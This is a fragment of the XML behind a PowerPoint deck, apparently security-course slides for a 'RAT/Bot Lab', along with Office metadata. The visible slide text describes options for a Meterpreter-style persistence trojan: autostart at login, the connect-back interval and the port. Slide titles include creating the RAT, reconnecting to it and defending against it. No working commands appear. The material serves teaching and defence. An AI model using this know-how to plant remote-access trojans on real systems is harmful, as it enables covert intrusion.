              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to automatically start when a user logs in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to set the time the trojan tries to connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier" panose="02060409020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to set the port this trojan tries to connect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4446067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364DE382E3924D9716985E5EC9DD06" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="adee4d99a0ef3424d84f2af5ebc03541">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="421edf8b-0c99-44a8-81ee-8c3d4609cca6" xmlns:ns4="24f12f22-2052-46e3-ad3c-52792f2472db" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f45b4b2d7a3af1bd4fb33e73469554dd" ns3:_="" ns4:_="">
    <xsd:import namespace="421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <xsd:import namespace="24f12f22-2052-46e3-ad3c-52792f2472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edf8b-0c99-44a8-81ee-8c3d4609cc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f12f22-2052-46e3-ad3c-52792f2472d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B3ABB9-AA52-4D39-BFCC-72746F262919}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472db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421edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{23F1A304-3901-451F-B5BD-FD4B50969F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9F9DFA-5A54-453E-BDD6-7A57FA6B8C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1edf8b-0c99-44a8-81ee-8c3d4609cca6"/>
    <ds:schemaRef ds:uri="24f12f22-2052-46e3-ad3c-52792f2472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350</TotalTime>
  <Words>625</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>97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Circe Light</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Berlin</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>RAT/Bot Lab</vt:lpstr>
      <vt:lpstr>Objectives Covered</vt:lpstr>
      <vt:lpstr>Pre-requisites</vt:lpstr>
      <vt:lpstr>What is a RAT and Bot?</vt:lpstr>
      <vt:lpstr>The Rat/Bot Lab</vt:lpstr>
      <vt:lpstr>Open a Meterpreter Session</vt:lpstr>
      <vt:lpstr>Check Persistence Options</vt:lpstr>
      <vt:lpstr>Check Persistence Options</vt:lpstr>
      <vt:lpstr>Create the RAT</vt:lpstr>
      <vt:lpstr>Create the RAT</vt:lpstr>
      <vt:lpstr>Explore the RAT</vt:lpstr>
      <vt:lpstr>Reconnect to the RAT/Bot</vt:lpstr>
      <vt:lpstr>Reconnect to the RAT/Bot</vt:lpstr>
      <vt:lpstr>Reconnect to the RAT/Bot</vt:lpstr>
      <vt:lpstr>Defend Against a RAT and Bots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dc:creator>Joseph MacAdam</dc:creator>
  <cp:lastModifiedBy>Richard Greene</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-18T18:05:33Z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0x01010008364DE382E3924D9716985E5EC9DD06</vt:lpwstr>
  </property>
</Properties>
</file>